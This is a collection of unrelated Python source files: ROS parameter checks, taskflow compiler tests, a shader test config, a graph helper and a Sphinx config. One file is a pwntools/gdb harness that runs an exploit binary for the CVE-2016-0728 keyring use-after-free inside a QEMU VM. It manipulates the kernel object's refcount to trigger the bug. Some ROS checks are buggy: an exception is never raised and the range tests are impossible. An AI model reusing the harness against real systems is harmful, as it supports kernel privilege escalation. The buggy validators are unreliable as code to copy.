License.\n\nimport rospy\n\nclass ParameterContractViolation(Exception):\n \"\"\"\n Basic exception for contract violations raised by parameters.\n \"\"\"\n def __init__(self, name, msg=None):\n if msg is None:\n # default error message\n msg = \"Contract violation of parameter %s\" % name\n super(ParameterContractViolation, self).__init__(msg)\n # make name accessible for exception handling\n self.name = name\n\nclass ParameterValueViolation(ParameterContractViolation):\n \"\"\"\n Exception for value contract violations raised by parameters.\n \"\"\"\n def __init__(self, name, value):\n super(ParameterValueViolation, self).__init__(\n name, msg=\"Parameter %s violated contract with value %s\" % (name, value))\n self.value = value\n\ndef 
_check_parameter_exists(name):\n \"\"\"\n Checks if a parameter exists.\n\n Args:\n name (string): Name of the parameter.\n Returns:\n bool: True if existing, False if not existing.\n \"\"\"\n if rospy.has_param(name):\n return True\n return False\n\ndef assert_parameter_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to exist but if\n it does not exist by raising an exception.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterContractViolation: Raised if parameter is not existing.\n \"\"\"\n if not _check_parameter_exists(name):\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef enforce_parameter_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to exist but if\n it does not exist by logging or diagnostics.\n\n Args:\n name (string): Name of the parameter.\n \"\"\"\n if not _check_parameter_exists(name):\n rospy.logwarn(\"Parameter %s not existing\" % (name))\n\ndef assert_parameter_not_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to not exist but\n if it does exist.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterContractViolation: Raised if parameter is existing.\n \"\"\"\n if rospy.has_param(name):\n raise ParameterContractViolation(name, \"Parameter %s existing\" % (name))\n\ndef assert_parameter_has_value(name, value):\n \"\"\"\n Indicates a contract violation if it is expected that the parameter has a\n specific value but if it has not.\n\n Args:\n name (string): Name of the parameter.\n value (depends on the parameter type): Value of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not like expected.\n \"\"\"\n if rospy.has_param(name):\n observed_value = rospy.get_param(name)\n if value != observed_value:\n ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef assert_parameter_in_range(name, lower_bound, upper_bound):\n \"\"\"\n Indicates a contract violation if it is expected that a parameter value of\n type 32-bit integers has a value within a defined range but if it has not.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not in the range.\n ParameterContractViolation: Raised if parameter does not exist.\n \"\"\"\n if rospy.has_param(name):\n value = rospy.get_param(name)\n if lower_bound > value > upper_bound:\n raise ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef assert_parameter_out_range(name, lower_bound, upper_bound):\n \"\"\"\n Indicates a contract violation if it is expected that a parameter value of\n type 32-bit integers has a value outside a defined range but if it has not.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not outside the range.\n ParameterContractViolation: Raised if parameter does not exist.\n \"\"\"\n if rospy.has_param(name):\n value = rospy.get_param(name)\n if lower_bound > value > upper_bound:\n raise ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n"} {"ext": "py", "sha": "1a310d12195444f1e28dfdb77c76764ad77f7c0a", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (C) 2012 Yahoo! Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom taskflow import engines\nfrom taskflow.engines.action_engine import compiler\nfrom taskflow import exceptions as exc\nfrom taskflow.patterns import graph_flow as gf\nfrom taskflow.patterns import linear_flow as lf\nfrom taskflow.patterns import unordered_flow as uf\nfrom taskflow import retry\nfrom taskflow import test\nfrom taskflow.tests import utils as test_utils\n\n\ndef _replicate_graph_with_names(compilation):\n # Turn a graph of nodes into a graph of names only so that\n # testing can use those names instead of having to use the exact\n # node objects themselves (which is problematic for any end nodes that\n # are added into the graph *dynamically*, and are not there in the\n # original/source flow).\n g = compilation.execution_graph\n n_g = g.__class__(name=g.name)\n for node, node_data in g.nodes_iter(data=True):\n n_g.add_node(node.name, attr_dict=node_data)\n for u, v, u_v_data in g.edges_iter(data=True):\n n_g.add_edge(u.name, v.name, attr_dict=u_v_data)\n return n_g\n\n\nclass PatternCompileTest(test.TestCase):\n def test_task(self):\n task = test_utils.DummyTask(name='a')\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(task).compile())\n self.assertEqual(['a'], list(g.nodes()))\n self.assertEqual([], list(g.edges()))\n\n def test_retry(self):\n r = retry.AlwaysRevert('r1')\n self.assertRaises(TypeError, compiler.PatternCompiler(r).compile)\n\n def test_wrong_object(self):\n msg_regex = '^Unknown object .* requested to compile'\n self.assertRaisesRegex(TypeError, msg_regex,\n compiler.PatternCompiler(42).compile)\n\n def test_empty(self):\n flo = lf.Flow(\"test\")\n compiler.PatternCompiler(flo).compile()\n\n def test_linear(self):\n a, b, c, d = test_utils.make_many(4)\n flo = lf.Flow(\"test\")\n flo.add(a, b, c)\n inner_flo = lf.Flow(\"sub-test\")\n inner_flo.add(d)\n flo.add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n\n order = g.topological_sort()\n self.assertEqual(['test', 'a', 'b', 'c',\n \"sub-test\", 'd', \"sub-test[$]\",\n 'test[$]'], order)\n self.assertTrue(g.has_edge('c', \"sub-test\"))\n self.assertTrue(g.has_edge(\"sub-test\", 'd'))\n self.assertEqual({'invariant': True},\n g.get_edge_data(\"sub-test\", 'd'))\n self.assertEqual(['test[$]'], list(g.no_successors_iter()))\n self.assertEqual(['test'], list(g.no_predecessors_iter()))\n\n def test_invalid(self):\n a, b, c = test_utils.make_many(3)\n flo = lf.Flow(\"test\")\n flo.add(a, b, c)\n flo.add(flo)\n self.assertRaises(ValueError,\n compiler.PatternCompiler(flo).compile)\n\n def test_unordered(self):\n a, b, c, d = test_utils.make_many(4)\n flo = uf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 
'test[$]'),\n ('d', 'test[$]'),\n ])\n self.assertEqual(set(['test']), set(g.no_predecessors_iter()))\n\n def test_linear_nested(self):\n a, b, c, d = test_utils.make_many(4)\n flo = lf.Flow(\"test\")\n flo.add(a, b)\n inner_flo = uf.Flow(\"test2\")\n inner_flo.add(c, d)\n flo.add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n\n sub_g = g.subgraph(['a', 'b'])\n self.assertFalse(sub_g.has_edge('b', 'a'))\n self.assertTrue(sub_g.has_edge('a', 'b'))\n self.assertEqual({'invariant': True}, sub_g.get_edge_data(\"a\", \"b\"))\n\n sub_g = g.subgraph(['c', 'd'])\n self.assertEqual(0, sub_g.number_of_edges())\n\n # This ensures that c and d do not start executing until after b.\n self.assertTrue(g.has_edge('b', 'test2'))\n self.assertTrue(g.has_edge('test2', 'c'))\n self.assertTrue(g.has_edge('test2', 'd'))\n\n def test_unordered_nested(self):\n a, b, c, d = test_utils.make_many(4)\n flo = uf.Flow(\"test\")\n flo.add(a, b)\n flo2 = lf.Flow(\"test2\")\n flo2.add(c, d)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'test2'),\n ('test2', 'c'),\n ('c', 'd'),\n ('d', 'test2[$]'),\n ('test2[$]', 'test[$]'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ])\n\n def test_unordered_nested_in_linear(self):\n a, b, c, d = test_utils.make_many(4)\n inner_flo = uf.Flow('ut').add(b, c)\n flo = lf.Flow('lt').add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n self.assertItemsEqual(g.edges(), [\n ('lt', 'a'),\n ('a', 'ut'),\n ('ut', 'b'),\n ('ut', 'c'),\n ('b', 'ut[$]'),\n ('c', 'ut[$]'),\n ('ut[$]', 'd'),\n ('d', 'lt[$]'),\n ])\n\n def test_graph(self):\n a, b, c, d = test_utils.make_many(4)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(6, len(compilation.execution_graph))\n self.assertEqual(8, compilation.execution_graph.number_of_edges())\n\n def test_graph_nested(self):\n a, b, c, d, e, f, g = test_utils.make_many(7)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n flo2 = lf.Flow('test2')\n flo2.add(e, f, g)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(11, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 'test[$]'),\n ('d', 'test[$]'),\n\n ('test', 'test2'),\n ('test2', 'e'),\n ('e', 'f'),\n ('f', 'g'),\n\n ('g', 'test2[$]'),\n ('test2[$]', 'test[$]'),\n ])\n\n def test_graph_nested_graph(self):\n a, b, c, d, e, f, g = test_utils.make_many(7)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n flo2 = gf.Flow('test2')\n flo2.add(e, f, g)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(11, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('test', 'test2'),\n\n ('test2', 'e'),\n ('test2', 'f'),\n ('test2', 'g'),\n\n ('e', 'test2[$]'),\n ('f', 'test2[$]'),\n ('g', 'test2[$]'),\n\n ('test2[$]', 'test[$]'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 'test[$]'),\n ('d', 'test[$]'),\n ])\n\n def test_graph_links(self):\n a, b, c, d = test_utils.make_many(4)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n flo.link(a, 
b)\n flo.link(b, c)\n flo.link(c, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('a', 'b', {'manual': True}),\n ('b', 'c', {'manual': True}),\n ('c', 'd', {'manual': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_graph_dependencies(self):\n a = test_utils.ProvidesRequiresTask('a', provides=['x'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=['x'])\n flo = gf.Flow(\"test\").add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(4, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('a', 'b', {'reasons': set(['x'])}),\n ('b', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_graph_nested_requires(self):\n a = test_utils.ProvidesRequiresTask('a', provides=['x'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=['x'])\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = gf.Flow(\"test\").add(a, inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(7, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('test2', 'b', {'invariant': True}),\n ('a', 'test2', {'reasons': set(['x'])}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n\n def test_graph_nested_provides(self):\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=['x'])\n b = test_utils.ProvidesRequiresTask('b', provides=['x'], requires=[])\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=[])\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = gf.Flow(\"test\").add(a, inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(7, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'test2', {'invariant': True}),\n ('a', 'test[$]', {'invariant': True}),\n\n # The 'x' requirement is produced out of test2...\n ('test2[$]', 'a', {'reasons': set(['x'])}),\n\n ('test2', 'b', {'invariant': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_empty_flow_in_linear_flow(self):\n flo = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n empty_flo = gf.Flow(\"empty\")\n flo.add(a, empty_flo, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertItemsEqual(g.edges(), [\n (\"lf\", \"a\"),\n (\"a\", \"empty\"),\n (\"empty\", \"empty[$]\"),\n (\"empty[$]\", \"b\"),\n (\"b\", \"lf[$]\"),\n ])\n\n def test_many_empty_in_graph_flow(self):\n flo = gf.Flow('root')\n\n a = test_utils.ProvidesRequiresTask('a', provides=[], 
requires=[])\n flo.add(a)\n\n b = lf.Flow('b')\n b_0 = test_utils.ProvidesRequiresTask('b.0', provides=[], requires=[])\n b_1 = lf.Flow('b.1')\n b_2 = lf.Flow('b.2')\n b_3 = test_utils.ProvidesRequiresTask('b.3', provides=[], requires=[])\n b.add(b_0, b_1, b_2, b_3)\n flo.add(b)\n\n c = lf.Flow('c')\n c_0 = lf.Flow('c.0')\n c_1 = lf.Flow('c.1')\n c_2 = lf.Flow('c.2')\n c.add(c_0, c_1, c_2)\n flo.add(c)\n\n d = test_utils.ProvidesRequiresTask('d', provides=[], requires=[])\n flo.add(d)\n\n flo.link(b, d)\n flo.link(a, d)\n flo.link(c, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n\n self.assertTrue(g.has_edge('root', 'a'))\n self.assertTrue(g.has_edge('root', 'b'))\n self.assertTrue(g.has_edge('root', 'c'))\n\n self.assertTrue(g.has_edge('b.0', 'b.1'))\n self.assertTrue(g.has_edge('b.1[$]', 'b.2'))\n self.assertTrue(g.has_edge('b.2[$]', 'b.3'))\n\n self.assertTrue(g.has_edge('c.0[$]', 'c.1'))\n self.assertTrue(g.has_edge('c.1[$]', 'c.2'))\n\n self.assertTrue(g.has_edge('a', 'd'))\n self.assertTrue(g.has_edge('b[$]', 'd'))\n self.assertTrue(g.has_edge('c[$]', 'd'))\n self.assertEqual(20, len(g))\n\n def test_empty_flow_in_nested_flow(self):\n flow = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n\n flow2 = lf.Flow(\"lf-2\")\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=[])\n d = test_utils.ProvidesRequiresTask('d', provides=[], requires=[])\n empty_flow = gf.Flow(\"empty\")\n flow2.add(c, empty_flow, d)\n flow.add(a, flow2, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flow).compile())\n for u, v in [('lf', 'a'), ('a', 'lf-2'),\n ('lf-2', 'c'), ('c', 'empty'),\n ('empty[$]', 'd'), ('d', 'lf-2[$]'),\n ('lf-2[$]', 'b'), ('b', 'lf[$]')]:\n self.assertTrue(g.has_edge(u, v))\n\n def test_empty_flow_in_graph_flow(self):\n flow = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=['a'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=['a'])\n empty_flow = lf.Flow(\"empty\")\n flow.add(a, empty_flow, b)\n\n compilation = compiler.PatternCompiler(flow).compile()\n g = compilation.execution_graph\n self.assertTrue(g.has_edge(flow, a))\n self.assertTrue(g.has_edge(a, empty_flow))\n\n empty_flow_successors = g.successors(empty_flow)\n self.assertEqual(1, len(empty_flow_successors))\n empty_flow_terminal = empty_flow_successors[0]\n self.assertIs(empty_flow, empty_flow_terminal.flow)\n self.assertEqual(compiler.FLOW_END,\n g.node[empty_flow_terminal]['kind'])\n self.assertTrue(g.has_edge(empty_flow_terminal, b))\n\n def test_empty_flow_in_graph_flow_linkage(self):\n flow = gf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n empty_flow = lf.Flow(\"empty\")\n flow.add(a, empty_flow, b)\n flow.link(a, b)\n\n compilation = compiler.PatternCompiler(flow).compile()\n g = compilation.execution_graph\n self.assertTrue(g.has_edge(a, b))\n self.assertTrue(g.has_edge(flow, a))\n self.assertTrue(g.has_edge(flow, empty_flow))\n\n def test_checks_for_dups(self):\n flo = gf.Flow(\"test\").add(\n test_utils.DummyTask(name=\"a\"),\n test_utils.DummyTask(name=\"a\")\n )\n e = engines.load(flo)\n self.assertRaisesRegex(exc.Duplicate,\n '^Atoms with duplicate names',\n e.compile)\n\n def test_checks_for_dups_globally(self):\n flo = gf.Flow(\"test\").add(\n 
gf.Flow(\"int1\").add(test_utils.DummyTask(name=\"a\")),\n gf.Flow(\"int2\").add(test_utils.DummyTask(name=\"a\")))\n e = engines.load(flo)\n self.assertRaisesRegex(exc.Duplicate,\n '^Atoms with duplicate names',\n e.compile)\n\n def test_retry_in_linear_flow(self):\n flo = lf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(3, len(compilation.execution_graph))\n self.assertEqual(2, compilation.execution_graph.number_of_edges())\n\n def test_retry_in_unordered_flow(self):\n flo = uf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(3, len(compilation.execution_graph))\n self.assertEqual(2, compilation.execution_graph.number_of_edges())\n\n def test_retry_in_graph_flow(self):\n flo = gf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n g = compilation.execution_graph\n self.assertEqual(3, len(g))\n self.assertEqual(2, g.number_of_edges())\n\n def test_retry_in_nested_flows(self):\n c1 = retry.AlwaysRevert(\"c1\")\n c2 = retry.AlwaysRevert(\"c2\")\n inner_flo = lf.Flow(\"test2\", c2)\n flo = lf.Flow(\"test\", c1).add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'test2', {'invariant': True, 'retry': True}),\n ('test2', 'c2', {'invariant': True}),\n ('c2', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['c2']['retry'])\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n\n def test_retry_in_linear_flow_with_tasks(self):\n c = retry.AlwaysRevert(\"c\")\n a, b = test_utils.make_many(2)\n flo = lf.Flow(\"test\", c).add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(5, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c', {'invariant': True}),\n ('a', 'b', {'invariant': True}),\n ('c', 'a', {'invariant': True, 'retry': True}),\n ('b', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n self.assertIs(c, g.node['a']['retry'])\n self.assertIs(c, g.node['b']['retry'])\n\n def test_retry_in_unordered_flow_with_tasks(self):\n c = retry.AlwaysRevert(\"c\")\n a, b = test_utils.make_many(2)\n flo = uf.Flow(\"test\", c).add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(5, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c', {'invariant': True}),\n ('c', 'a', {'invariant': True, 'retry': True}),\n ('c', 'b', {'invariant': True, 'retry': True}),\n ('b', 'test[$]', {'invariant': True}),\n ('a', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n self.assertIs(c, g.node['a']['retry'])\n self.assertIs(c, g.node['b']['retry'])\n\n def test_retry_in_graph_flow_with_tasks(self):\n r = retry.AlwaysRevert(\"r\")\n a, b, c = test_utils.make_many(3)\n flo = gf.Flow(\"test\", r).add(a, b, c).link(b, c)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'r', 
{'invariant': True}),\n ('r', 'a', {'invariant': True, 'retry': True}),\n ('r', 'b', {'invariant': True, 'retry': True}),\n ('b', 'c', {'manual': True}),\n ('a', 'test[$]', {'invariant': True}),\n ('c', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n self.assertIs(r, g.node['a']['retry'])\n self.assertIs(r, g.node['b']['retry'])\n self.assertIs(r, g.node['c']['retry'])\n\n def test_retries_hierarchy(self):\n c1 = retry.AlwaysRevert(\"c1\")\n c2 = retry.AlwaysRevert(\"c2\")\n a, b, c, d = test_utils.make_many(4)\n inner_flo = lf.Flow(\"test2\", c2).add(b, c)\n flo = lf.Flow(\"test\", c1).add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(10, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'a', {'invariant': True, 'retry': True}),\n ('a', 'test2', {'invariant': True}),\n ('test2', 'c2', {'invariant': True}),\n ('c2', 'b', {'invariant': True, 'retry': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'd', {'invariant': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['a']['retry'])\n self.assertIs(c1, g.node['d']['retry'])\n self.assertIs(c2, g.node['b']['retry'])\n self.assertIs(c2, g.node['c']['retry'])\n self.assertIs(c1, g.node['c2']['retry'])\n self.assertIsNone(g.node['c1'].get('retry'))\n\n def test_retry_subflows_hierarchy(self):\n c1 = retry.AlwaysRevert(\"c1\")\n a, b, c, d = test_utils.make_many(4)\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = lf.Flow(\"test\", c1).add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(9, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'a', {'invariant': True, 'retry': True}),\n ('a', 'test2', {'invariant': True}),\n ('test2', 'b', {'invariant': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'd', {'invariant': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['a']['retry'])\n self.assertIs(c1, g.node['d']['retry'])\n self.assertIs(c1, g.node['b']['retry'])\n self.assertIs(c1, g.node['c']['retry'])\n self.assertIsNone(g.node['c1'].get('retry'))\n"} {"ext": "py", "sha": "1a310d14fbb512fb7d3d75bf99d7b451b11e34bf", "content": "#!/usr/bin/env python\n\ncommand += testshade (\"-g 128 128 --layer testlay -param:lockgeom=0 scale 5.0 test -iters 2 -reparam testlay scale 15.0 -od uint8 -o Cout out.tif\")\noutputs = [ \"out.txt\", \"out.tif\" ]\n# expect a few LSB failures\nfailthresh = 0.004\nfailpercent = 0.05\n"} {"ext": "py", "sha": "1a310d203832ad7c7c8a40c8d3a6aa8c2ea91551", "content": "#!/usr/bin/python\nfrom pwn import *\nimport sys\nsys.path.append('/home/ww9210/develop/vminstance')\nsys.path.append('/home/ww9210/develop/dataflowanalyzer')\nimport vminstance\nimport dataflowanalyzer\nimport subprocess\nimport re\nimport random\n\ndef test_0728(gdb_port=random.randint(15000,16000)):\n context.update(arch = 'amd64')\n start_time = time.time()\n vm = vminstance.vmInstance(qemu_config_file = \\\n '/home/ww9210/develop/kuafffp/poc_qemu_config/cve-2016-0728-nokasan.cfg' \\\n , gdb_deamon_port = gdb_port\\\n , log_filename = 'vm_log_0728_ce.txt'\\\n , start_grace_time = 5\\\n , enable_kvm = True\\\n , two_cpus = True\\\n )\n 
vm.run_gdb_deamon()\n vm.run()\n vm.connect()\n\n vm.s.put('exp_boost')\n sh = vm.s.shell('/bin/sh')\n sh.sendline('chmod +x ./exp_boost')\n sleep(1)\n\n gdb = dataflowanalyzer.DebuggerGdb(gdbport = gdb_port, qemu_gdbport = vm.qemu_config.gdb_port\\\n , vmlinux_path = vm.qemu_config.vmlinux_path)\n\n gdb.connectGdb()\n gdb.loadVmlinux()\n gdb.connectQemu()\n gdb.b(0xffffffff812dcca8)\n \"\"\"\n 0xffffffff812dcca2 <join_session_keyring+114>: mov rsi,r13\n 0xffffffff812dcca5 <join_session_keyring+117>: mov rdi,r12\n 0xffffffff812dcca8 <join_session_keyring+120>: call 0xffffffff812dc8b0 <install_session_keyring_to_cred>\n \"\"\"\n gdb.b('wait_for_key_construction')\n gdb.c()\n \n sh.sendline('./exp_boost ww9210')\n print 'catching...'\n gdb.catch()\n obj_base = gdb.get_reg('rsi')\n print 'object base is: ', hex(obj_base)\n gdb.delete(1)\n gdb.cmd('watch *'+hex(obj_base))\n for i in range(5):\n gdb.c()\n cont = gdb.catch()\n print cont\n if 'key_put' in cont and '0xffffffff812d8d28' in cont and gdb.xgx(obj_base)&0xffffffff == 2:\n gdb.set_int(obj_base, 1)\n gdb.delete(2)\n gdb.delete(3)\n gdb.b(0xffffffff812d8bd8)\n gdb.c()\n break\n\n\n print 'object base', hex(obj_base)\n gdb.Gdbinteractive()\n sh.interactive()\n\n vm.shutdown()\n\nif __name__ == '__main__':\n test_0728()\n"} {"ext": "py", "sha": "1a310d4d247ce5efed3b60e838880a331fd5168d", "content": "from graphs.graph import Graph\n\ndef get_edges(g,verticies_list):\n sum=0\n for i in range(0, len(verticies_list)-1):\n found=False\n for neighbor in g.get_neighbors(verticies_list[i]):\n if verticies_list[i+1] == neighbor[0]:\n sum+=neighbor[1]\n found=True\n if found == False :\n return(False,0) \n return (True, sum)\n \n "} {"ext": "py", "sha": "1a310e449d16efbc2d2233e2f79f55b5a509bd02", "content": "# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n\nimport os\nimport pathlib\nimport sys\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n# see https://pypi.org/project/setuptools-scm/ for details\nfrom pkg_resources import get_distribution\n\n\nprint(\"python exec:\", sys.executable)\nprint(\"sys.path:\", sys.path)\nroot = pathlib.Path(__file__).parent.parent.absolute()\nos.environ[\"PYTHONPATH\"] = str(root)\nsys.path.insert(0, str(root))\n\nimport ragmac_xdem # isort:skip\n\n# -- Project information -----------------------------------------------------\n\nproject = \"ragmac_xdem\"\ncopyright = \"2021, Amaury Dehecq\"\nauthor = \"Amaury Dehecq\"\n\nrelease = get_distribution(\"ragmac_xdem\").version\n# for example take major/minor\nversion = \".\".join(release.split(\".\")[:2])\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. 
